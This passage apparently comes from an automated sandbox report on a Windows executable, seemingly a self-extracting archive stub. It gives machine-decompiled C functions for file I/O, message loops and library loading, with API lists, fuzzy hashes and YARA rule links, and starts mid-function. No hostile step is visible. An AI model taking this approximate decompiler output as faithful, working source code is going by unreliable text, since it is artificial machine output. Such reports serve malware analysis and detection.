							_t65 = _t59 & _t89;
							_t86 = _t95 + 8;
							__eflags = _t65 - 0x400;
							if(_t65 > 0x400) {
								__eflags = _t95 - _t86;
								asm("sbb eax, eax");
								_t100 = E00CC7A8A(_t86, _t65 & _t86);
								_pop(_t86);
								__eflags = _t100;
								if(_t100 == 0) {
									goto L35;
								}
								 *_t100 = 0xdddd;
								L28:
								_t100 =  &(_t100[4]);
								goto L30;
							}
							__eflags = _t95 - _t86;
							asm("sbb eax, eax");
							E00CD0EE0();
							_t100 = _t106;
							__eflags = _t100;
							if(_t100 == 0) {
								goto L35;
							}
							 *_t100 = 0xcccc;
							goto L28;
						}
						_t69 = _a28;
						if(_t69 == 0) {
							goto L37;
						}
						_t124 = _t104 - _t69;
						if(_t104 > _t69) {
							goto L36;
						}
						_t104 = E00CC9C64(0, _t104, _t124, _a8, _a12, _t80, _t99, _a24, _t69, 0, 0, 0);
						if(_t104 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t71 = _t54 & _t94 + 0x00000008;
					_t84 = _t94 + 8;
					if((_t54 & _t94 + 0x00000008) > 0x400) {
						__eflags = _t94 - _t84;
						asm("sbb eax, eax");
						_t80 = E00CC7A8A(_t84, _t71 & _t84);
						_pop(_t84);
						__eflags = _t80;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t80 = 0xdddd;
						L12:
						_t80 =  &(_t80[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E00CD0EE0();
					_t80 = _t106;
					if(_t80 == 0) {
						goto L36;
					}
					 *_t80 = 0xcccc;
					goto L12;
				}
			}


























                0x00cc95aa
                0x00cc95ab
                0x00cc95ac
                0x00cc95b3
                0x00cc95b7
                0x00cc95b8
                0x00cc95be
                0x00cc95c4
                0x00cc95ca
                0x00cc95cd
                0x00cc95cd
                0x00cc95d0
                0x00cc95d2
                0x00cc95d2
                0x00cc95d0
                0x00cc95d4
                0x00cc95d9
                0x00cc95e0
                0x00cc95e3
                0x00cc95e3
                0x00cc95ff
                0x00cc9605
                0x00cc960a
                0x00cc979d
                0x00cc97b0
                0x00cc9610
                0x00cc9610
                0x00cc9613
                0x00cc9618
                0x00cc961c
                0x00cc9670
                0x00cc9670
                0x00cc9672
                0x00cc9674
                0x00cc9792
                0x00cc9792
                0x00cc9794
                0x00cc9795
                0x00cc979b
                0x00000000
                0x00cc979b
                0x00cc9685
                0x00cc968b
                0x00cc968d
                0x00000000
                0x00000000
                0x00cc9693
                0x00cc96a5
                0x00cc96aa
                0x00cc96ae
                0x00000000
                0x00000000
                0x00cc96bb
                0x00cc96f5
                0x00cc96f8
                0x00cc96fb
                0x00cc96fd
                0x00cc96ff
                0x00cc9701
                0x00cc974d
                0x00cc974d
                0x00cc974f
                0x00cc974f
                0x00cc9751
                0x00cc978b
                0x00cc978c
                0x00000000
                0x00cc9791
                0x00cc9765
                0x00cc976a
                0x00cc976c
                0x00000000
                0x00000000
                0x00cc9770
                0x00cc9771
                0x00cc9772
                0x00cc9775
                0x00cc97b1
                0x00cc97b4
                0x00cc9777
                0x00cc9777
                0x00cc9778
                0x00cc9778
                0x00cc9785
                0x00cc9787
                0x00cc9789
                0x00cc97ba
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00cc9789
                0x00cc9703
                0x00cc9706
                0x00cc9708
                0x00cc970a
                0x00cc970c
                0x00cc970f
                0x00cc9714
                0x00cc972f
                0x00cc9731
                0x00cc973b
                0x00cc973d
                0x00cc973e
                0x00cc9740
                0x00000000
                0x00000000
                0x00cc9742
                0x00cc9748
                0x00cc9748
                0x00000000
                0x00cc9748
                0x00cc9716
                0x00cc9718
                0x00cc971c
                0x00cc9721
                0x00cc9723
                0x00cc9725
                0x00000000
                0x00000000
                0x00cc9727
                0x00000000
                0x00cc9727
                0x00cc96bd
                0x00cc96c2
                0x00000000
                0x00000000
                0x00cc96c8
                0x00cc96ca
                0x00000000
                0x00000000
                0x00cc96e6
                0x00cc96ea
                0x00000000
                0x00000000
                0x00000000
                0x00cc96f0
                0x00cc9623
                0x00cc9625
                0x00cc9627
                0x00cc962f
                0x00cc964e
                0x00cc9650
                0x00cc965a
                0x00cc965c
                0x00cc965d
                0x00cc965f
                0x00000000
                0x00000000
                0x00cc9665
                0x00cc966b
                0x00cc966b
                0x00000000
                0x00cc966b
                0x00cc9633
                0x00cc9637
                0x00cc963c
                0x00cc9640
                0x00000000
                0x00000000
                0x00cc9646
                0x00000000
                0x00cc9646

                APIs
                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00CC451B,00CC451B,?,?,?,00CC97F6,00000001,00000001,31E85006), ref: 00CC95FF
                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00CC97F6,00000001,00000001,31E85006,?,?,?), ref: 00CC9685
                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,31E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00CC977F
                • __freea.LIBCMT ref: 00CC978C
                  • Part of subcall function 00CC7A8A: RtlAllocateHeap.NTDLL(00000000,?,?,?,00CC2FA6,?,0000015D,?,?,?,?,00CC4482,000000FF,00000000,?,?), ref: 00CC7ABC
                • __freea.LIBCMT ref: 00CC9795
                • __freea.LIBCMT ref: 00CC97BA
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: ByteCharMultiWide__freea$AllocateHeap
                • String ID:
                • API String ID: 1414292761-0
                • Opcode ID: 50fb995f4e4dff14611e8b6a814ed06e46805c3d89b6932b6a0bbb0ef737b6ba
                • Instruction ID: b9d3edee72d1eec7433e10def6538dbab95811310d4abcac6e44d9a86e52ae28
                • Opcode Fuzzy Hash: 50fb995f4e4dff14611e8b6a814ed06e46805c3d89b6932b6a0bbb0ef737b6ba
                • Instruction Fuzzy Hash: 6E510E72621216ABEB258F64CC89FAF77A9EB40760F25462DFC14D6180EB34DD40DBA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CB9A32, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00CB9A32(long _a4) {
				short _v164;
				long _t5;
				long _t6;
				WCHAR* _t9;
				long _t11;

				_t11 = _a4;
				_t5 = GetClassNameW(_t11,  &_v164, 0x50);
				if(_t5 != 0) {
					_t9 = L"EDIT";
					_t5 = E00CB1410( &_v164, _t9);
					if(_t5 != 0) {
						_t5 = FindWindowExW(_t11, 0, _t9, 0); // executed
						_t11 = _t5;
					}
				}
				if(_t11 != 0) {
					_t6 = SHAutoComplete(_t11, 0x10); // executed
					return _t6;
				}
				return _t5;
			}








                0x00cb9a42
                0x00cb9a49
                0x00cb9a51
                0x00cb9a54
                0x00cb9a61
                0x00cb9a68
                0x00cb9a70
                0x00cb9a76
                0x00cb9a76
                0x00cb9a78
                0x00cb9a7b
                0x00cb9a80
                0x00000000
                0x00cb9a80
                0x00cb9a8a

                APIs
                • GetClassNameW.USER32(?,?,00000050), ref: 00CB9A49
                • SHAutoComplete.SHLWAPI(?,00000010), ref: 00CB9A80
                  • Part of subcall function 00CB1410: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,00CAACFE,?,?,?,00CAACAD,?,-00000002,?,00000000,?), ref: 00CB1426
                • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00CB9A70
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: AutoClassCompareCompleteFindNameStringWindow
                • String ID: EDIT$pltv
                • API String ID: 4243998846-1976670045
                • Opcode ID: a325766594948c9668202941b4e5e465f20bf0b67d61f7667983bbaaee502d8b
                • Instruction ID: ad388060ab115a65c69e97f7344861fffcb1d71dfe3c1d6211301dc23c9a1ade
                • Opcode Fuzzy Hash: a325766594948c9668202941b4e5e465f20bf0b67d61f7667983bbaaee502d8b
                • Instruction Fuzzy Hash: 79F08232A4122877D73097A59C46FEF776CDB86B51F440167BE02A31C0D7749A0296F6
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CA9768, Relevance: 7.6, APIs: 5, Instructions: 116filetimeCOMMON
                Download Yara Rule
                C-Code - Quality: 94%
                			E00CA9768(void* __ecx, void* __esi, struct _FILETIME _a4, signed int _a8, short _a12, WCHAR* _a4184, unsigned int _a4188) {
				long _v0;
				void* _t48;
				long _t59;
				unsigned int _t61;
				long _t64;
				signed int _t65;
				char _t68;
				void* _t72;
				void* _t74;
				long _t78;
				void* _t81;

				_t74 = __esi;
				E00CBD940();
				_t61 = _a4188;
				_t72 = __ecx;
				 *(__ecx + 0x1020) =  *(__ecx + 0x1020) & 0x00000000;
				if( *((char*)(__ecx + 0x1d)) != 0 || (_t61 & 0x00000004) != 0) {
					_t68 = 1;
				} else {
					_t68 = 0;
				}
				_push(_t74);
				asm("sbb esi, esi");
				_t78 = ( ~(_t61 >> 0x00000001 & 1) & 0xc0000000) + 0x80000000;
				if((_t61 & 0x00000001) != 0) {
					_t78 = _t78 | 0x40000000;
				}
				_t64 =  !(_t61 >> 3) & 0x00000001;
				if(_t68 != 0) {
					_t64 = _t64 | 0x00000002;
				}
				_v0 = (0 |  *((intOrPtr*)(_t72 + 0x15)) != 0x00000000) - 0x00000001 & 0x08000000;
				E00CA6EF9( &_a12);
				if( *((char*)(_t72 + 0x1c)) != 0) {
					_t78 = _t78 | 0x00000100;
				}
				_t48 = CreateFileW(_a4184, _t78, _t64, 0, 3, _v0, 0); // executed
				_t81 = _t48;
				if(_t81 != 0xffffffff) {
					L17:
					if( *((char*)(_t72 + 0x1c)) != 0 && _t81 != 0xffffffff) {
						_a4.dwLowDateTime = _a4.dwLowDateTime | 0xffffffff;
						_a8 = _a8 | 0xffffffff;
						SetFileTime(_t81, 0,  &_a4, 0);
					}
					 *((char*)(_t72 + 0x12)) = 0;
					_t65 = _t64 & 0xffffff00 | _t81 != 0xffffffff;
					 *((intOrPtr*)(_t72 + 0xc)) = 0;
					 *((char*)(_t72 + 0x10)) = 0;
					if(_t81 != 0xffffffff) {
						 *(_t72 + 4) = _t81;
						E00CAFAB1(_t72 + 0x1e, _a4184, 0x800);
					}
					return _t65;
				} else {
					_a4.dwLowDateTime = GetLastError();
					if(E00CAB32C(_a4184,  &_a12, 0x800) == 0) {
						L15:
						if(_a4.dwLowDateTime == 2) {
							 *((intOrPtr*)(_t72 + 0x1020)) = 1;
						}
						goto L17;
					}
					_t81 = CreateFileW( &_a12, _t78, _t64, 0, 3, _v0, 0);
					_t59 = GetLastError();
					if(_t59 == 2) {
						_a4.dwLowDateTime = _t59;
					}
					if(_t81 != 0xffffffff) {
						goto L17;
					} else {
						goto L15;
					}
				}
			}














                0x00ca9768
                0x00ca976d
                0x00ca9773
                0x00ca977c
                0x00ca977e
                0x00ca9789
                0x00ca9794
                0x00ca9790
                0x00ca9790
                0x00ca9790
                0x00ca979a
                0x00ca97a2
                0x00ca97aa
                0x00ca97b3
                0x00ca97b5
                0x00ca97b5
                0x00ca97c0
                0x00ca97c5
                0x00ca97c7
                0x00ca97c7
                0x00ca97dc
                0x00ca97e0
                0x00ca97e9
                0x00ca97eb
                0x00ca97eb
                0x00ca9804
                0x00ca980a
                0x00ca980f
                0x00ca9873
                0x00ca9878
                0x00ca987f
                0x00ca9888
                0x00ca9893
                0x00ca9893
                0x00ca989e
                0x00ca98a1
                0x00ca98a4
                0x00ca98a7
                0x00ca98ad
                0x00ca98be
                0x00ca98c2
                0x00ca98c2
                0x00ca98d2
                0x00ca9811
                0x00ca9817
                0x00ca9833
                0x00ca9862
                0x00ca9867
                0x00ca9869
                0x00ca9869
                0x00000000
                0x00ca9867
                0x00ca984c
                0x00ca984e
                0x00ca9857
                0x00ca9859
                0x00ca9859
                0x00ca9860
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00ca9860

                APIs
                • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,?,00000000,?,00000000,?,?,00CA76F2,?,00000005,?,00000011), ref: 00CA9804
                • GetLastError.KERNEL32(?,?,00CA76F2,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00CA9811
                • CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,00000000,00000800,?,?,00CA76F2,?,00000005,?), ref: 00CA9846
                • GetLastError.KERNEL32(?,?,00CA76F2,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00CA984E
                • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00CA76F2,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00CA9893
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: File$CreateErrorLast$Time
                • String ID:
                • API String ID: 1999340476-0
                • Opcode ID: 207602e87edb90cefc3e20e6829330244e42ecccb501fb72514cf52506e7630f
                • Instruction ID: edd3eba4f89e6c0cfec8119706d1de4f300b6e70e804856c268e6f49b6686f5a
                • Opcode Fuzzy Hash: 207602e87edb90cefc3e20e6829330244e42ecccb501fb72514cf52506e7630f
                • Instruction Fuzzy Hash: FA4128314447476BE3209F648C06BDABBE4EB03328F10071AF9B1961D0D779A989CB91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CBA388, Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00CBA388() {
				struct tagMSG _v32;
				int _t7;
				struct HWND__* _t10;
				long _t14;

				_t7 = PeekMessageW( &_v32, 0, 0, 0, 0); // executed
				if(_t7 != 0) {
					GetMessageW( &_v32, 0, 0, 0);
					_t10 =  *0xce75c8; // 0x202da
					if(_t10 == 0) {
						L3:
						TranslateMessage( &_v32);
						_t14 = DispatchMessageW( &_v32); // executed
						return _t14;
					}
					_t7 = IsDialogMessageW(_t10,  &_v32); // executed
					if(_t7 == 0) {
						goto L3;
					}
				}
				return _t7;
			}







                0x00cba399
                0x00cba3a1
                0x00cba3aa
                0x00cba3b0
                0x00cba3b7
                0x00cba3c8
                0x00cba3cc
                0x00cba3d6
                0x00000000
                0x00cba3d6
                0x00cba3be
                0x00cba3c6
                0x00000000
                0x00000000
                0x00cba3c6
                0x00cba3e0

                APIs
                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00CBA399
                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CBA3AA
                • IsDialogMessageW.USER32(000202DA,?), ref: 00CBA3BE
                • TranslateMessage.USER32(?), ref: 00CBA3CC
                • DispatchMessageW.USER32(?), ref: 00CBA3D6
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Message$DialogDispatchPeekTranslate
                • String ID:
                • API String ID: 1266772231-0
                • Opcode ID: d3a68b8975cf5e6aa2d9cca6929e9861aa3b5134fd5f52e7db441a22d99f4fe4
                • Instruction ID: fdc7017adb14935826186b60d50f9e471960625198e75cb54bb64b3740cbaf3c
                • Opcode Fuzzy Hash: d3a68b8975cf5e6aa2d9cca6929e9861aa3b5134fd5f52e7db441a22d99f4fe4
                • Instruction Fuzzy Hash: D2F0BD71D12229AB8B20DBE5EC4CFEF7FACEE053517404516F55AD2010E764D505C7A1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CB9AA0, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35comCOMMON
                Download Yara Rule
                C-Code - Quality: 25%
                			E00CB9AA0(intOrPtr* __ecx) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _t10;

				_t10 = E00CAFCFD(L"riched20.dll"); // executed
				 *__ecx = _t10;
				 *0xcddffc(0); // executed
				_v16 = 8;
				_v12 = 0x7ff;
				 *0xcddeb4( &_v16);
				_v32 = 1;
				_v28 = 0;
				_v24 = 0;
				_v20 = 0;
				L00CBD820(); // executed
				 *0xcddf08(0xce75c0,  &_v8,  &_v32, 0); // executed
				return __ecx;
			}











                0x00cb9aaf
                0x00cb9ab6
                0x00cb9ab9
                0x00cb9ac2
                0x00cb9aca
                0x00cb9ad1
                0x00cb9adb
                0x00cb9ae6
                0x00cb9aea
                0x00cb9aed
                0x00cb9af0
                0x00cb9afa
                0x00cb9b07

                APIs
                  • Part of subcall function 00CAFCFD: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00CAFD18
                  • Part of subcall function 00CAFCFD: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00CAE7F6,Crypt32.dll,?,00CAE878,?,00CAE85C,?,?,?,?), ref: 00CAFD3A
                • OleInitialize.OLE32(00000000), ref: 00CB9AB9
                • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00CB9AF0
                • SHGetMalloc.SHELL32(00CE75C0), ref: 00CB9AFA
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                • String ID: riched20.dll
                • API String ID: 3498096277-3360196438
                • Opcode ID: 5a8ea7fbf43a704450c3bb8634398a8abf0b478df08cff370e14c11f5889ffa3
                • Instruction ID: 1a7bbb93af4f9e7285a76993c786f19fc290733f2df604917870d99c09e69860
                • Opcode Fuzzy Hash: 5a8ea7fbf43a704450c3bb8634398a8abf0b478df08cff370e14c11f5889ffa3
                • Instruction Fuzzy Hash: 52F0FFB1D01209ABCB10AF99D849BEEFBFCEF94715F00416BE815A2251DBB456058BA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CBC891, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32COMMON
                Download Yara Rule
                C-Code - Quality: 66%
                			E00CBC891(void* __eflags, WCHAR* _a4) {
				char _v8196;
				int _t7;
				WCHAR* _t12;
				void* _t14;

				_t14 = __eflags;
				E00CBD940();
				SetEnvironmentVariableW(L"sfxcmd", _a4); // executed
				_t7 = E00CAF835(_t14, _a4,  &_v8196, 0x1000);
				_t12 = _t7;
				if(_t12 != 0) {
					_push( *_t12 & 0x0000ffff);
					while(E00CAF94C() != 0) {
						_t12 =  &(_t12[1]);
						__eflags = _t12;
						_push( *_t12 & 0x0000ffff);
					}
					_t7 = SetEnvironmentVariableW(L"sfxpar", _t12); // executed
				}
				return _t7;
			}







                0x00cbc891
                0x00cbc899
                0x00cbc8a7
                0x00cbc8bc
                0x00cbc8c1
                0x00cbc8c5
                0x00cbc8ca
                0x00cbc8d4
                0x00cbc8cd
                0x00cbc8cd
                0x00cbc8d3
                0x00cbc8d3
                0x00cbc8e3
                0x00cbc8e3
                0x00cbc8ed

                APIs
                • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00CBC8A7
                • SetEnvironmentVariableW.KERNELBASE(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00CBC8E3
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: EnvironmentVariable
                • String ID: sfxcmd$sfxpar
                • API String ID: 1431749950-3493335439
                • Opcode ID: 3bf8684b6ae233941fee505b4437a9b1ab258b1088a6b40041141a82e4cfc763
                • Instruction ID: 18d9221daf775851551abe74eaaca1123a265637dc64f2b48b73ac2dedff7106
                • Opcode Fuzzy Hash: 3bf8684b6ae233941fee505b4437a9b1ab258b1088a6b40041141a82e4cfc763
                • Instruction Fuzzy Hash: 56F0A772811225A6D7202FD19C49FEEB76D9F19751F004077FE8896182DA718D41DBF1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CA964A, Relevance: 6.1, APIs: 4, Instructions: 57fileCOMMON
                Download Yara Rule
                C-Code - Quality: 59%
                			E00CA964A(void* __ecx, void* _a4, long _a8) {
				long _v8;
				int _t14;
				signed int _t15;
				void* _t25;

				_push(__ecx);
				_t25 = __ecx;
				if( *((intOrPtr*)(__ecx + 0xc)) == 1) {
					 *(_t25 + 4) = GetStdHandle(0xfffffff6);
				}
				_t14 = ReadFile( *(_t25 + 4), _a4, _a8,  &_v8, 0); // executed
				if(_t14 != 0) {
					_t15 = _v8;
				} else {
					_t16 = E00CA9745(_t25);
					if(_t16 == 0) {
						L7:
						if( *((intOrPtr*)(_t25 + 0xc)) != 1) {
							L10:
							if( *((intOrPtr*)(_t25 + 0xc)) != 0 || _a8 <= 0x8000) {
								L14:
								_t15 = _t16 | 0xffffffff;
							} else {
								_t16 = GetLastError();
								if(_t16 != 0x21) {
									goto L14;
								} else {
									_push(0x8000);
									goto L6;
								}
							}
						} else {
							_t16 = GetLastError();
							if(_t16 != 0x6d) {
								goto L10;
							} else {
								_t15 = 0;
							}
						}
					} else {
						_t16 = 0x4e20;
						if(_a8 <= 0x4e20) {
							goto L7;
						} else {
							_push(0x4e20);
							L6:
							_push(_a4);
							_t15 = E00CA964A(_t25);
						}
					}
				}
				return _t15;
			}







                0x00ca964d
                0x00ca9650
                0x00ca9656
                0x00ca9660
                0x00ca9660
                0x00ca9672
                0x00ca967a
                0x00ca96d6
                0x00ca967c
                0x00ca967e
                0x00ca9685
                0x00ca969e
                0x00ca96a2
                0x00ca96b3
                0x00ca96b7
                0x00ca96d1
                0x00ca96d1
                0x00ca96c3
                0x00ca96c3
                0x00ca96cc
                0x00000000
                0x00ca96ce
                0x00ca96ce
                0x00000000
                0x00ca96ce
                0x00ca96cc
                0x00ca96a4
                0x00ca96a4
                0x00ca96ad
                0x00000000
                0x00ca96af
                0x00ca96af
                0x00ca96af
                0x00ca96ad
                0x00ca9687
                0x00ca9687
                0x00ca968f
                0x00000000
                0x00ca9691
                0x00ca9691
                0x00ca9692
                0x00ca9692
                0x00ca9697
                0x00ca9697
                0x00ca968f
                0x00ca9685
                0x00ca96de

                APIs
                • GetStdHandle.KERNEL32(000000F6), ref: 00CA965A
                • ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 00CA9672
                • GetLastError.KERNEL32 ref: 00CA96A4
                • GetLastError.KERNEL32 ref: 00CA96C3
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: ErrorLast$FileHandleRead
                • String ID:
                • API String ID: 2244327787-0
                • Opcode ID: 6f3a02ce651f465ab5f6ab010b451a65a78648d95029ca8ffe9d322a7153b365
                • Instruction ID: 9e34947bdd2be3c33a5aea6e6ffc289f11df34c3b860a6f126a93ab69bb2a46b
                • Opcode Fuzzy Hash: 6f3a02ce651f465ab5f6ab010b451a65a78648d95029ca8ffe9d322a7153b365
                • Instruction Fuzzy Hash: 9C11AC3050160AEFDFA05B61C943A6D77ADEF12328F00C52AF83A851A0EB749E40DF51
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CC9A2C, Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMON
                Download Yara Rule
                C-Code - Quality: 95%
                			E00CC9A2C(signed int _a4) {
				signed int _t9;
				void* _t10;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0xd00768 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0xcd5ba0 + _t9 * 4);
					_t10 = LoadLibraryExW(_t22, 0, 0x800); // executed
					_t27 = _t10;
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0x814d2928
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}











                0x00cc9a31
                0x00cc9a35
                0x00cc9a3c
                0x00cc9a40
                0x00cc9a4e
                0x00cc9a5e
                0x00cc9a64
                0x00cc9a68
                0x00cc9a91
                0x00cc9a93
                0x00cc9a97
                0x00cc9a9a
                0x00cc9a9a
                0x00cc9aa0
                0x00cc9aa2
                0x00000000
                0x00cc9aa3
                0x00cc9a6a
                0x00cc9a73
                0x00cc9a82
                0x00cc9a75
                0x00cc9a78
                0x00cc9a7e
                0x00cc9a7e
                0x00cc9a86
                0x00000000
                0x00cc9a88
                0x00cc9a8b
                0x00cc9a8d
                0x00000000
                0x00cc9a8d
                0x00cc9a86
                0x00cc9a42
                0x00cc9a47
                0x00000000

                APIs
                • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,00CC2E0F,00000000,00000000,?,00CC99D3,00CC2E0F,00000000,00000000,00000000,?,00CC9BD0,00000006,FlsSetValue), ref: 00CC9A5E
                • GetLastError.KERNEL32(?,00CC99D3,00CC2E0F,00000000,00000000,00000000,?,00CC9BD0,00000006,FlsSetValue,00CD6058,00CD6060,00000000,00000364,?,00CC85E8), ref: 00CC9A6A
                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00CC99D3,00CC2E0F,00000000,00000000,00000000,?,00CC9BD0,00000006,FlsSetValue,00CD6058,00CD6060,00000000), ref: 00CC9A78
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
